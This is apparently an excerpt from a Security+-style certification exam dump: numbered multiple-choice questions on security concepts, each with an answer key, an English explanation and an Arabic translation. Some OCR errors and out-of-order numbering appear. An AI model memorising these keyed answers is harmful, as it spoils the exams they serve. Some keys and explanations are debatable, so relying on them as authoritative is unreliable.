‫ (المصادقة متعددة العوامل) هي طريقة للتحقق من هوية المستخدم من خلال طلب عاملين أو أكثر أو سمات تنتمي إلى فئات‬MFA :‫تفسير‬
‫ وشيء أنت عليه (مثل‬، )‫ وشيء لديك (مثل رمز مميز أو بطاقة ذكية‬، )‫ الفئات هي شيء تعرفه (مثل كلمة مرور أو رقم تعريف شخصي‬.‫مختلفة‬
، ‫ في هذه الحالة‬.)IP ‫ وفي مكان ما أنت فيه (مثل موقع أو عنوان‬، )‫ وشيء تفعله (مثل إيماءة أو أمر صوتي‬، )‫بصمة الإصبع أو مسح قزحية العين‬
.‫يقوم المستخدم بإدخال كلمة مرور (شيء تعرفه) ثم يتلقى رمز مصادقة (شيء لديك) لتسجيل الدخول إلى محطة عمل‬
169 / 198
The safer , easier way to help you pass any IT exams.
314. The alert indicates an attacker entered thousands of characters into the text box of a web form. The
web form was intended for legitimate customers to enter their phone numbers.
Which of the attacks has most likely occurred?
A. Privilege escalation
B. Buffer overflow
C. Resource exhaustion
D. Cross-site scripting
Answer: B
Explanation:
A buffer overflow attack occurs when an attacker inputs more data than the buffer can store, causing the
excess data to overwrite adjacent memory locations and corrupt or execute code1. In this case, the
attacker entered thousands of characters into a text box that was intended for phone numbers, which are
much shorter. This could result in a buffer overflow attack that compromises the web application or
server. The other options are not related to this scenario. Privilege escalation is when an attacker gains
unauthorized access to higher-level privileges or resources2. Resource exhaustion is when an attacker
consumes all the available resources of a system, such as CPU, memory, disk space, etc., to cause a
denial of service3. Cross-site scripting is when an attacker injects malicious code into a web page that is
executed by the browser of a victim who visits the page.
‫ كان نموذج الويب مخصصا‬.‫يشير التنبيه إلى أن أحد المهاجمين أدخل آلاف الأحرف في مربع النص الخاص بنموذج و يب‬
‫ أي من الهجمات قد وقعت على الأرجح؟ تجاوز سعة المخزن المؤقت‬.‫للعملاء الشرعيين لإدخال أرقام هواتفهم‬
،‫ يحدث هجوم تجاوز سعة المخزن المؤقت عندما يقوم مهاجم بإدخال بيانات أكثر مما يمكن للمخزن المؤقت تخزينه‬:‫تفسير‬
‫ في هذه‬.1‫مما يتسبب في قيام البيانات الزائدة بالكتابة فوق مواقع الذاكرة المجاورة وإتلاف التعليمات البرمجية أو تنفيذها‬
‫ قد يؤدي هذا إلى هجوم تجاوز‬.‫ وهي أقصر بكثير‬، ‫ أدخل المهاجم آلاف الأحرف في مربع نص مخصص لأرقام الهواتف‬، ‫الحالة‬
‫ يحدث تصعيد‬.‫ لا ترتبط الخيارات الأخرى بهذا السيناريو‬.‫سعة المخزن المؤقت الذي يعرض تطبيق الويب أو الخادم للخطر‬
‫ يحدث استنفاد الموارد‬.2‫الامتيازات عندما يحصل مهاجم على وصول غير مصرح به إلى امتيازات أو موارد ذات مستوى أعلى‬
، ‫ مثل وحدة المعالجة المركزية والذاكرة ومساحة القرص وما إلى ذلك‬، ‫عندما يستهلك المهاجم جميع الموارد المتاحة للنظام‬
‫ البرمجة النصية عبر المواقع هي عندما يقوم المهاجم بإدخال تعليمات برمجية ضارة في صفحة‬.3‫للتسبب في رفض الخدمة‬
.‫ويب يتم تنفيذها بواسطة متصفح الضحية الذي يزور الصفحة‬
170 / 198
The safer , easier way to help you pass any IT exams.
315. The findings in a consultant's report indicate the most critical risk to the security posture from an
incident response perspective is a lack of workstation and server investigation capabilities.
Which of the following should be implemented to remediate this risk?
A. HIDS
B. FDE
C. NGFW
D. EDR
Answer: D
Explanation:
EDR solutions are designed to detect and respond to malicious activity on workstations and servers, and
they provide a detailed analysis of the incident, allowing organizations to quickly remediate the threat.
According to the CompTIA Security+ SY0-601 Official Text Book, EDR solutions can be used to detect
malicious activity on endpoints, investigate the incident, and contain the threat. EDR solutions can also
provide real-time monitoring and alerting for potential security events, as well as detailed forensic
analysis for security incidents. Additionally, the text book recommends that organizations also implement
a host-based intrusion detection system (HIDS) to alert them to malicious activity on their workstations
and servers.
‫تشير النتائج الواردة في تقرير استشاري إلى أن الخطر الأكثر خطورة على الوضع الأمني من منظور الاستجابة للحوادث هو نقص قدرات التحقيق‬
‫ أي مما يلي يجب تنفيذه لعلاج هذا الخطر؟ ادر‬.‫في محطة العمل والخادم‬
‫ مما يسمح‬، ‫ وهي توفر تحليلا مفصلا للحادث‬، ‫ لاكتشاف النشاط الضار على محطات العمل والخوادم والاستجابة له‬EDR ‫ تم تصميم حلول‬:‫تفسير‬
‫ للكشف عن النشاط‬EDR ‫ يمكن استخدام حلول‬، 601-SY0 + Security CompTIA ‫ وفقا للكتاب النصي الرسمي‬.‫للمؤسسات بمعالجة التهديد بسرعة‬
‫ أيضا مراقبة وتنبيها في الوقت الفعلي للأحداث الأمنية‬EDR ‫ يمكن أن توفر حلول‬.‫ واحتواء التهديد‬، ‫ والتحقيق في الحادث‬، ‫الضار على نقاط النهاية‬
‫ يوصي الكتاب المدرسي بأن تقوم المؤسسات أيضا بتنفيذ نظام‬، ‫ بالإضافة إلى ذلك‬.‫ بالإضافة إلى تحليل جنائي مفصل للحوادث الأمنية‬، ‫المحتملة‬
.‫) لتنبيهها إلى النشاط الضار على محطات العمل والخوادم الخاصة بها‬HIDS( ‫كشف التسلل المستند إلى المضيف‬
316.A security administrator is integrating several segments onto a single network. One of the segments,
which includes legacy devices, presents a significant amount of risk to the network.
Which of the following would allow users to access to the legacy devices without compromising the
security of the entire network?
A. NIDS
B. MAC filtering
C. Jump server
D. IPSec
E. NAT gateway
Answer: C
Explanation:
A jump server is a device that acts as an intermediary between users and other devices on a network. A
jump server can provide a secure and controlled access point to the legacy devices without exposing
them directly to the network. A jump server can also enforce authentication, authorization, logging, and
auditing policies.
‫ قدرا‬، ‫ والذي يتضمن الأجهزة القديمة‬، ‫ يمثل أحد القطاعات‬.‫ يقوم مسؤول الأمن بدمج عدة قطاعات في شبكة واحدة‬-316
‫ أي مما يلي سيسمح للمستخدمين بالوصول إلى الأجهزة القديمة دون المساس بأمان الشبكة‬.‫كبيرا من المخاطر على الشبكة‬
‫بالكامل؟خادم الانتقال السريع‬
‫ يمكن أن يوفر خادم الانتقال نقطة‬.‫ خادم الانتقال هو جهاز يعمل كوسيط بين المستخدمين والأجهزة الأخرى على الشبكة‬:‫تفسير‬
‫ يمكن لخادم الانتقال السريع أيضا فرض‬.‫وصول آمنة وخاضعة للتحكم إلى الأجهزة القديمة دون تعريضها مباشرة للشبكة‬
.‫سياسات المصادقة والتخويل والتسجيل والتدقيق‬
171 / 198
The safer , easier way to help you pass any IT exams.
317. Unauthorized devices have been detected on the internal network. The devices’ locations were
traced to Ether ports located in conference rooms.
Which of the following would be the best technical controls to implement to prevent these devices from
accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
Answer: A
Explanation:
NAC stands for network access control, which is a security solution that enforces policies and controls
on devices that attempt to access a network. NAC can help prevent unauthorized devices from
accessing the internal network by verifying their identity, compliance, and security posture before
granting them access. NAC can also monitor and restrict the activities of authorized devices based on
predefined rules and roles.
‫ الموجودة في غرف‬Ether ‫ تم تتبع مواقع الأجهزة إلى منافذ‬.‫تم اكتشاف أجهزة غير مصرح بها على الشبكة الداخلية‬
‫ أي مما يلي يعد أفضل عناصر التحكم الفنية التي يجب تنفيذها لمنع هذه الأجهزة من الوصول إلى الشبكة‬.‫المؤتمرات‬
NAC ‫الداخلية؟‬
‫ وهو حل أمني يفرض السياسات وعناصر التحكم على الأجهزة التي تحاول‬، ‫ تعني التحكم في الوصول إلى الشبكة‬NAC :‫شرح‬
‫ في منع الأجهزة غير المصرح بها من الوصول إلى الشبكة الداخلية من خلال‬NAC ‫ يمكن أن يساعد‬.‫الوصول إلى الشبكة‬
‫ أيضا مراقبة وتقييد أنشطة الأجهزة‬NAC ‫ يمكن ل‬.‫التحقق من هويتها وامتثالها ووضعها الأمني قبل منحها حق الوصول‬
.‫المصرح بها بناء على قواعد وأدوار محددة مسبقا‬
318. Stakeholders at an organisation must be kept aware of any incidents and receive updates on status
changes as they occur.
Which of the following Plans would fulfill this requirement?
A. Communication plan
B. Disaster recovery plan
C. Business continuity plan
D. Risk plan
Answer: A
Explanation:
A communication plan is a plan that would fulfill the requirement of keeping stakeholders at an
organization aware of any incidents and receiving updates on status changes as they occur. A
communication plan is a document that outlines the communication objectives, strategies, methods,
channels, frequency, and audience for an incident response process. A communication plan can help an
organization communicate effectively and efficiently with internal and external stakeholders during an
incident and keep them informed of the incident’s impact, progress, resolution, and recovery.
‫ أي‬.‫يجب أن يكون أصحاب المصلحة في المؤسسة على علم بأي حوادث وأن يتلقوا تحديثات حول تغييرات الحالة عند حدوثها‬
‫من الخطط التالية ستفي بهذا المطلب؟ خطة التواصل‬
‫ خطة الاتصال هي خطة من شأنها أن تفي بمتطلبات إبقاء أصحاب المصلحة في المنظمة على دراية بأي حوادث‬:‫تفسير‬
‫ خطة الاتصال هي وثيقة تحدد أهداف الاتصال واستراتيجياته وأساليبه‬.‫وتلقي تحديثات حول تغييرات الحالة عند حدوثها‬
‫ يمكن أن تساعد خطة الاتصال المؤسسة على التواصل بفعالية وكفاءة‬.‫وقنواته وتكراره وجمهوره لعملية الاستجابة للحوادث‬
.‫مع أصحاب المصلحة الداخليين والخارجيين أثناء وقوع حادث وإبقائهم على اطلاع بتأثير الحادث وتقدمه وحله وتعافيه‬
172 / 198
The safer , easier way to help you pass any IT exams.
319. Which Of the following will provide the best physical security countermeasures to Stop intruders?
(Select two).
A. Alarm
B. Signage
C. Lighting
D. Access control vestibules
E. Fencing
F. Sensors
Answer: C,E
Explanation:
Lighting and fencing are physical security countermeasures that can deter or stop intruders from
accessing a facility or an asset. Lighting can increase visibility and reduce hiding spots for intruders,
while fencing can create a physical barrier and limit access points for intruders.
‫ إضاءة _ تسوير‬.)‫أي مما يلي سيوفر أفضل الإجراءات الأمنية المادية المضادة لوقف المتسللين؟ (حدد اثنين‬
.‫ الإضاءة والسياج هي تدابير أمنية مادية مضادة يمكن أن تردع أو تمنع المتسللين من الوصول إلى منشأة أو أصل‬:‫تفسير‬
‫ بينما يمكن أن يخلق السياج حاجزا ماديا ويحد من نقاط‬، ‫يمكن للإضاءة أن تزيد من الرؤية وتقلل من أماكن الاختباء للمتسللين‬
.‫الوصول للمتسللين‬
320.A security team will be outsourcing several key functions to a third party and will require that:
• Several of the functions will carry an audit burden.
• Attestations will be performed several times a year.
• Reports will be generated on a monthly basis.
Which of the following BEST describes the document that is used to define these requirements and
stipulate how and when they are performed by the third party?
A. MOU
B. AUP
C. SLA
D. MSA
Answer: C
Explanation:
A service level agreement (SLA) is a contract between a service provider and a customer that outlines
the services that are to be provided and the expected levels of performance. It is used to define the
requirements for the service, including any attestations and reports that must be generated, and the
timescales in which these must be completed. It also outlines any penalties for failing to meet these
requirements. SLAs are essential for ensuring that third-party services are meeting the agreed upon
performance levels.
‫ وستتحمل العديد من المهام عبء‬:‫ وسيقوم فريق أمني بإسناد عدة وظائف رئيسية إلى طرف ثالث وسيتطلب ما يلي‬-320
‫ أي مما يلي يصف‬.‫ سيتم إنشاء التقارير على أساس شهري‬.‫ سيتم إجراء الشهادات عدة مرات في السنة‬.‫مراجعة الحسابات‬
‫المستند المستخدم لتحديد هذه المتطلبات وينص على كيفية ووقت تنفيذها من قبل الطرف الثالث؟ سلا‬
‫) هي عقد بين مزود الخدمة والعميل يحدد الخدمات التي سيتم تقديمها ومستويات الأداء‬SLA( ‫ اتفاقية مستوى الخدمة‬:‫تفسير‬
‫ والجداول الزمنية التي‬، ‫ بما في ذلك أي شهادات وتقارير يجب إنشاؤها‬، ‫ يتم استخدامه لتحديد متطلبات الخدمة‬.‫المتوقعة‬
‫ تعد اتفاقيات مستوى الخدمة ضرورية لضمان تلبية خدمات‬.‫ كما يحدد أي عقوبات لعدم تلبية هذه المتطلبات‬.‫يجب إكمالها‬
.‫الجهات الخارجية لمستويات الأداء المتفق عليها‬
173 / 198
The safer , easier way to help you pass any IT exams.
321.Which of the following can be used by an authentication application to validate a user's credentials
without the need to store the actual sensitive data?
A. Salt string
B. Private Key
C. Password hash
D. Cipher stream
Answer: C
Explanation:
Password hash is a method of storing a user’s credentials without the need to store the actual sensitive
data. A password hash is a one-way function that transforms the user’s password into a fixed-length
string of characters that cannot be reversed. The authentication application can then compare the
password hash with the stored hash to validate the user’s credentials without revealing the original
password.
‫أي مما يلي يمكن استخدامه بواسطة تطبيق المصادقة للتحقق من صحة بيانات اعتماد المستخدم دون الحاجة إلى تخزين‬.321
‫البيانات الحساسة الفعلية؟ تجزئة كلمة المرور‬
.‫ تجزئة كلمة المرور هي طريقة لتخزين بيانات اعتماد المستخدم دون الحاجة إلى تخزين البيانات الحساسة الفعلية‬:‫تفسير‬
‫تجزئة كلمة المرور هي وظيفة أحادية الاتجاه تحول كلمة مرور المستخدم إلى سلسلة ثابتة الطول من الأحرف التي لا يمكن‬
‫ يمكن لتطبيق المصادقة بعد ذلك مقارنة تجزئة كلمة المرور مع التجزئة المخزنة للتحقق من صحة بيانات اعتماد‬.‫عكسها‬
.‫المستخدم دون الكشف عن كلمة المرور الأصلية‬
322.A security analyst is assisting a team of developers with best practices for coding. The security
analyst would like to defend against the use of SQL injection attacks.
Which of the following should the security analyst recommend first?
A. Tokenization
B. Input validation
C. Code signing
D. Secure cookies
Answer: B
Explanation:
Input validation is a technique that involves checking the user input for any malicious or unexpected
characters or commands that could be used to perform SQL injection attacks. Input validation can be
done by using allow-lists or deny-lists to filter out the input based on predefined criteria. Input validation
can prevent SQL injection attacks by ensuring that only valid and expected input is passed to the
database queries.
‫ الأمن يود المحلل الدفاع ضد استخدام‬.‫ ويساعد محلل أمني فريقا من المطورين في وضع أفضل الممارسات للترميز‬-322
‫ أي مما يلي يجب أن يوصي به محلل الأمان أولا؟ التحقق من صحة الإدخال‬. ‫هجمات حقن اس كيو ال‬
‫ التحقق من صحة الإدخال هو أسلوب يتضمن التحقق من إدخال المستخدم بحثا عن أي أحرف أو أوامر ضارة أو غير‬:‫تفسير‬
‫ يمكن إجراء التحقق من صحة الإدخال باستخدام قوائم السماح أو قوائم‬.SQL ‫متوقعة يمكن استخدامها لتنفيذ هجمات حقن‬
‫ من خلال‬SQL ‫ يمكن أن يمنع التحقق من صحة الإدخال هجمات حقن‬.‫الرفض لتصفية المدخلات بناء على معايير محددة مسبقا‬
.‫التأكد من تمرير الإدخال الصحيح والمتوقع فقط إلى استعلامات قاعدة البيانات‬
174 / 198
The safer , easier way to help you pass any IT exams.
323. An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security
policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?
A. Application allow list
B. Load balancer
C. Host-based firewall
D. VPN
Answer: C
Explanation:
A host-based firewall is a software application that runs on each individual host and controls the
incoming and outgoing network traffic based on a set of rules. A host-based firewall can be used to block
or allow specific ports, protocols, IP addresses, or applications.
An engineer can use a host-based firewall to accomplish the task of disabling all web-server ports except
443 on a group of 100 web servers in a cloud environment. The engineer can configure the firewall rules
on each web server to allow only HTTPS traffic on port 443 and deny any other traffic. Alternatively, the
engineer can use a centralized management tool to deploy and enforce the firewall rules across all web
servers.
‫ يجب تعطيل جميع منافذ خادم‬، ‫ وفقا لسياسة الأمان‬.‫ خادم و يب في بيئة سحابية‬100 ‫قام مهندس مؤخرا بنشر مجموعة من‬
‫ أي مما يلي يمكن استخدامه لإنجاز هذه المهمة؟ جدار الحماية المستند إلى المضيف‬.443 ‫الويب باستثناء‬
‫ جدار الحماية المستند إلى المضيف هو تطبيق برمجي يعمل على كل مضيف فردي ويتحكم في حركة مرور الشبكة‬:‫تفسير‬
‫ يمكن استخدام جدار الحماية المستند إلى المضيف لحظر أو السماح بمنافذ‬.‫الواردة والصادرة بناء على مجموعة من القواعد‬
‫ يمكن للمهندس استخدام جدار حماية قائم على المضيف لإنجاز مهمة تعطيل‬.‫ أو تطبيقات معينة‬IP ‫أو بروتوكولات أو عناوين‬
‫ يمكن للمهندس تكوين قواعد جدار‬.‫ خادم ويب في بيئة سحابية‬100 ‫ على مجموعة من‬443 ‫جميع منافذ خادم الويب باستثناء‬
، ‫ بدلا من ذلك‬.‫ ورفض أي حركة مرور أخرى‬443 ‫ فقط على المنفذ‬HTTPS ‫الحماية على كل خادم ويب للسماح بحركة مرور‬
.‫يمكن للمهندس استخدام أداة إدارة مركزية لنشر وفرض قواعد جدار الحماية عبر جميع خوادم الويب‬
324. An organization wants to quickly assess how effectively the IT team hardened new laptops.
Which of the following would be the best solution to perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files.
B. Load current baselines into the existing vulnerability scanner.
C. Maintain a risk register with each security control marked as compliant or non-compliant.
D. Manually review the secure configuration guide checklists.
Answer: B
Explanation:
A vulnerability scanner is a tool that can scan devices and systems for known vulnerabilities,
misconfigurations, and compliance issues. By loading the current baselines into the scanner, the
organization can compare the actual state of the new laptops with the desired state and identify any
deviations or weaknesses. This is a quick and automated way to assess the hardening of the new
laptops.
‫ أي مما يلي هو أفضل حل‬.‫تريد المؤسسة إجراء تقييم سريع لمدى فعالية فريق تكنولوجيا المعلومات في تقوية أجهزة الكمبيوتر المحمولة الجديدة‬
.‫لإجراء هذا التقييم؟ قم بتحميل خطوط الأساس الحالية في أداة فحص الثغرات الأمنية الحالية‬
‫ أداة فحص الثغرات الأمنية هي أداة يمكنها فحص الأجهزة والأنظمة بحثا عن الثغرات الأمنية المعروفة والتكوينات الخاطئة ومشكلات‬:‫تفسير‬
‫ يمكن للمؤسسة مقارنة الحالة الفعلية لأجهزة الكمبيوتر المحمولة الجديدة‬، ‫ من خلال تحميل خطوط الأساس الحالية في الماسح الضوئي‬.‫التوافق‬
.‫ هذه طريقة سريعة وآلية لتقييم تصلب الجديد اجهزه الكمبيوتر المحموله‬.‫بالحالة المطلوبة وتحديد أي انحرافات أو نقاط ضعف‬
175 / 198
The safer , easier way to help you pass any IT exams.
325.A data cento has experienced an increase in under-voltage events Mowing electrical grid
maintenance outside the facility These events are leading to occasional losses of system availability.
Which of the following would be the most cost-effective solution for the data center 10 implement''
A. Uninterruptible power supplies with battery backup
B. Managed power distribution units lo track these events
C. A generator to ensure consistent, normalized power delivery
D. Dual power supplies to distribute the load more evenly
Answer: A
Explanation:
Uninterruptible power supplies with battery backup would be the most cost-effective solution for the data
center to implement to prevent under-voltage events following electrical grid maintenance outside the
facility. An uninterruptible power supply (UPS) is a device that provides emergency power to a load when
the main power source fails or drops below an acceptable level. A UPS with battery backup can help
prevent under-voltage events by switching to battery power when it detects a voltage drop or outage in
the main power source. A UPS with battery backup can also protect the data center equipment from
power surges or spikes.
‫ شهدت سنتو البيانات زيادة في أحداث الجهد المنخفض صيانة الشبكة الكهربائية خارج المنشأة وتؤدي هذه الأحداث إلى خسائر عرضية في‬-325
‫ '' ؟‬10 ‫ أي مما يلي سيكون الحل الأكثر فعالية من حيث التكلفة لتنفيذ مركز البيانات‬.‫توافر النظام‬
‫إمدادات الطاقة غير المنقطعة مع بطارية احتياطية‬
‫ ستكون إمدادات الطاقة غير المنقطعة مع البطارية الاحتياطية هي الحل الأكثر فعالية من حيث التكلفة لمركز البيانات لتنفيذه لمنع أحداث‬:‫تفسير‬
‫) هو جهاز يوفر طاقة طارئة للحمل عندما يفشل‬UPS( ‫ مصدر الطاقة غير المنقطع‬.‫الجهد المنخفض بعد صيانة الشبكة الكهربائية خارج المنشأة‬
‫ مع بطارية احتياطية في منع أحداث الجهد المنخفض عن‬UPS ‫ يمكن أن يساعد‬.‫مصدر الطاقة الرئيسي أو ينخفض إلى ما دون المستوى المقبول‬
‫ مع بطارية احتياطية أيضا‬UPS ‫ يمكن ل‬.‫طريق التبديل إلى طاقة البطارية عندما يكتشف انخفاضا في الجهد أو انقطاعا في مصدر الطاقة الرئيسي‬
.‫حماية معدات مركز البيانات من ارتفاع الطاقة أو الارتفاعات‬
326.A security analyst receives an alert that indicates a user's device is displaying anomalous behavior
The analyst suspects the device might be compromised.
Which of the following should the analyst to first?
A. Reboot the device
B. Set the host-based firewall to deny an incoming connection
C. Update the antivirus definitions on the device
D. Isolate the device
Answer: D
Explanation:
Isolating the device is the first thing that a security analyst should do if they suspect that a user’s device
might be compromised. Isolating the device means disconnecting it from the network or placing it in a
separate network segment to prevent further communication with potential attackers or malicious hosts.
Isolating the device can help contain the incident, limit the damage or data loss, preserve the evidence,
and facilitate the investigation and remediation.
‫ أي مما‬.‫يتلقى محلل أمني تنبيها يشير إلى أن جهاز المستخدم يعرض سلوكا شاذا يشتبه المحلل في احتمال اختراق الجهاز‬.326
‫يلي يجب على المحلل أولا؟ عزل الجهاز‬
‫ يعني عزل الجهاز‬.‫ عزل الجهاز هو أول شيء يجب على محلل الأمان فعله إذا اشتبه في احتمال اختراق جهاز المستخدم‬:‫تفسير‬
‫فصله عن الشبكة أو وضعه في جزء منفصل من الشبكة لمنع المزيد من الاتصال مع المهاجمين المحتملين أو المضيفين‬
‫ وتسهيل‬، ‫ والحفاظ على الأدلة‬، ‫ والحد من الضرر أو فقدان البيانات‬، ‫ يمكن أن يساعد عزل الجهاز في احتواء الحادث‬.‫الضارين‬
.‫التحقيق والمعالجة‬
176 / 198
The safer , easier way to help you pass any IT exams.
327. Which of the following would be used to find the most common web-application vulnerabilities?
A. OWASP
B. MITRE ATT&CK
C. Cyber Kill Chain
D. SDLC
Answer: A
Explanation:
OWASP (Open Web Application Security Project) is a non-profit organization that provides resources
and guidance for improving the security of web applications. It publishes a list of the most common web
application vulnerabilities, such as injection, broken authentication, cross-site scripting, etc., and
provides recommendations and best practices for preventing and mitigating them
‫أي مما يلي يمكن استخدامه للعثور على الثغرات الأمنية الأكثر شيوعا في تطبيقات الويب؟ أواسب‬
‫ (مشروع أمان تطبيقات الويب المفتوحة) هي منظمة غير ربحية توفر الموارد والإرشادات لتحسين أمان‬OWASP :‫تفسير‬
‫ والبرمجة‬، ‫ والمصادقة المعطلة‬، ‫ مثل الحقن‬، ‫ ينشر قائمة بنقاط الضعف الأكثر شيوعا في تطبيقات الويب‬.‫تطبيقات الويب‬
‫ ويقدم توصيات وأفضل الممارسات لمنعها والتخفيف من حدتها‬، ‫ وما إلى ذلك‬، ‫النصية عبر المواقع‬
329.A large retail store's network was breached recently. and this news was made public. The Store did
not lose any intellectual property, and no customer information was stolen. Although no fines were
incurred as a result, the Store lost revenue after the breach.
Which of the following is the
most likely reason for this issue?
A. Employee training
B. Leadership changes
C. Reputation
D. Identity theft
Answer: C
Explanation:
Reputation is the perception or opinion that customers, partners, investors, etc., have about a company
or its products and services. It can affect the revenue and profitability of a company after a network
breach, even if no intellectual property or customer information was stolen, because it can damage the
trust and confidence of the stakeholders and reduce their willingness to do business with the company
‫ لم يفقد المتجر أي ملكية فكرية‬.‫ وتم نشر هذا الخبر على الملأ‬.‫ وتعرضت شبكة متاجر كبيرة للبيع بالتجزئة للاختراق مؤخرا‬-329
‫ أي‬.‫ فقد المتجر الإيرادات بعد الخرق‬، ‫ على الرغم من عدم تكبد غرامات نتيجة لذلك‬.‫ ولم تتم سرقة أي معلومات عن العميل‬،
‫مما يلي هو السبب الأكثر احتمالا لهذه المشكلة؟ السمعه‬
‫ حول شركة أو منتجاتها‬، ‫ وما إلى ذلك‬، ‫ السمعة هي التصور أو الرأي الذي لدى العملاء والشركاء والمستثمرين‬:‫تفسير‬
‫ حتى لو لم تتم سرقة أي ملكية فكرية أو معلومات‬، ‫ يمكن أن يؤثر على إيرادات وربحية الشركة بعد خرق الشبكة‬.‫وخدماتها‬
‫ لأنه يمكن أن يضر بثقة وثقة أصحاب المصلحة ويقلل من استعدادهم للقيام بأعمال تجارية مع الشركة‬، ‫العملاء‬
177 / 198
The safer , easier way to help you pass any IT exams.
328. An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and
SFTP, and to specifically block FTP.
Which of the following would BEST accomplish this goal?
A. [Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any
Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Deny: Any Any 21 -Deny: Any Any
B. [Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any
Any 67 -Allow: Any Any 68 -Deny: Any Any 22 -Allow: Any Any 21 -Deny: Any Any
C. [Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any
Any 22 -Deny: Any Any 67 -Deny: Any Any 68 -Deny: Any Any 21 -Allow: Any Any
D. [Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Deny: Any
Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Allow: Any Any 21 -Allow: Any Any
Answer: A
Explanation:
This firewall rule set allows a subnet to only access DHCP, web pages, and SFTP, and specifically blocks
FTP by allowing or denying traffic based on the source, destination, and port.
The rule set is as follows:
✑ Allow any source and any destination on port 80 (HTTP)
✑ Allow any source and any destination on port 443 (HTTPS)
✑ Allow any source and any destination on port 67 (DHCP server)
✑ Allow any source and any destination on port 68 (DHCP client)
✑ Allow any source and any destination on port 22 (SFTP)
✑ Deny any source and any destination on port 21 (FTP)
✑ Deny any source and any destination on any other port
‫ ولحظر‬، SFTP ‫ وصفحات الويب و‬DHCP ‫يقوم المسؤول بتكوين قاعدة جدار حماية تم تعيينها لشبكة فرعية للوصول فقط إلى‬
‫ أي مما يلي يحقق هذا الهدف على أفضل وجه؟‬.‫ على وجه التحديد‬FTP
‫ وتحظر‬، SFTP ‫ وصفحات الويب و‬DHCP ‫ تسمح مجموعة قواعد جدار الحماية هذه للشبكة الفرعية بالوصول فقط إلى‬:‫تفسير‬
‫ مجموعة القواعد هي‬.‫ على وجه التحديد عن طريق السماح بحركة المرور أو رفضها استنادا إلى المصدر والوجهة والمنفذ‬FTP
:‫كما يلي‬
)HTTP( 80 ‫✑ السماح لأي مصدر وأي وجهة على المنفذ‬
)HTTPS( 443 ‫✑ السماح لأي مصدر وأي وجهة على المنفذ‬
)DHCP ‫ (خادم‬67 ‫✑ السماح بأي مصدر وأي وجهة على المنفذ‬
)DHCP ‫ (عميل‬68 ‫✑ السماح بأي مصدر وأي وجهة على المنفذ‬
)SFTP( 22 ‫✑ السماح بأي مصدر وأي وجهة على المنفذ‬
)FTP( 21 ‫✑ نفي أي مصدر وأي وجهة على المنفذ‬
‫✑ نفي أي مصدر وأي وجهة على أي ميناء آخر‬
178 / 198
The safer , easier way to help you pass any IT exams.
330.A security operations center wants to implement a solution that can execute files to test for malicious
activity. The solution should provide a report of the files' activity against known
threats. Which of the following should the security operations center implement?
A. the Harvester
B. Nessus
C. Cuckoo
D. Sn1per
Answer: C
Explanation:
Cuckoo is a sandbox that is specifically written to run programs inside and identify any malware. A
sandbox is a virtualized environment that isolates the program from the rest of the system and monitors
its behavior. Cuckoo can analyze files of various types, such as executables, documents, URLs, and
more. Cuckoo can provide a report of the files’ activity against known threats, such as network traffic, file
operations, registry changes, API calls, and so on.
A security operations center can implement Cuckoo to execute files to test for malicious activity and
generate a report of the analysis. Cuckoo can help the security operations center to detect and prevent
malware infections, investigate incidents, and perform threat intelligence.
‫ يجب أن يقدم الحل تقريرا عن نشاط الملفات مقابل المعروف‬.‫يريد مركز عمليات الأمان تنفيذ حل يمكنه تنفيذ ملفات لاختبار النشاط الضار‬.330
‫ أي مما يلي يجب أن ينفذه مركز العمليات الأمنية؟ كوكو‬.‫التهديدات‬
‫ وضع الحماية هو بيئة افتراضية تعزل البرنامج‬.‫ هو صندوق رمل مكتوب خصيصا لتشغيل البرامج بالداخل وتحديد أي برامج ضارة‬Cuckoo :‫تفسير‬
.‫ والمزيد‬URL ‫ مثل الملفات التنفيذية والمستندات وعناوين‬، ‫ تحليل الملفات من أنواع مختلفة‬Cuckoo ‫ يمكن ل‬.‫عن بقية النظام وتراقب سلوكه‬
‫ مثل حركة مرور الشبكة وعمليات الملفات وتغييرات السجل‬، ‫ تقريرا عن نشاط الملفات ضد التهديدات المعروفة‬Cuckoo ‫يمكن أن يوفر‬
‫ لتنفيذ الملفات لاختبار النشاط الضار وإنشاء تقرير‬Cuckoo ‫ يمكن لمركز عمليات الأمان تنفيذ‬.‫واستدعاءات واجهة برمجة التطبيقات وما إلى ذلك‬
‫ مركز عمليات الأمان في اكتشاف الإصابات بالبرامج الضارة ومنعها والتحقيق في الحوادث وتنفيذ التحليل الذكي‬Cuckoo ‫ يمكن أن يساعد‬.‫بالتحليل‬
.‫للتهديدات‬
331.A security administrator would like to ensure all cloud servers will have software preinstalled for
facilitating vulnerability scanning and continuous monitoring.
Which of the following concepts should the administrator utilize?
A. Provisioning
B. Staging
C. Development
D. Quality assurance
Answer: A
Explanation:
Provisioning is the process of creating and setting up IT infrastructure, and includes the steps required to manage user and
system access to various resources. Provisioning can be done for servers, cloud environments, users, networks, services, and
more.
In this case, the security administrator wants to ensure that all cloud servers will have software preinstalled for facilitating
vulnerability scanning and continuous monitoring. This means that the administrator needs to provision the cloud servers
with the necessary software and configuration beforethey are deployed or used by customers or end users. Provisioning
can help automate and standardizethe process of setting up cloud servers and reduce the risk of human errors or
inconsistencies.
‫ أي‬.‫ويود مدير الأمن أن يضمن أن جميع الخواديم السحابية ستكون لديها برمجيات مثبتة مسبقا لتيسير فحص الثغرات الأمنية والرصد المستمر‬.331
‫من المفاهيم التالية يجب أن يستخدمها المسؤول؟ توفير‬
‫ ويتضمن الخطوات المطلوبة لإدارة وصول المستخدم والنظام إلى‬، ‫ التوفير هو عملية إنشاء البنية التحتية لتكنولوجيا المعلومات وإعدادها‬:‫تفسير‬
‫ يريد مسؤول الأمان‬، ‫ في هذه الحالة‬.‫ يمكن إجراء التوفير للخوادم والبيئات السحابية والمستخدمين والشبكات والخدمات والمزيد‬.‫الموارد المختلفة‬
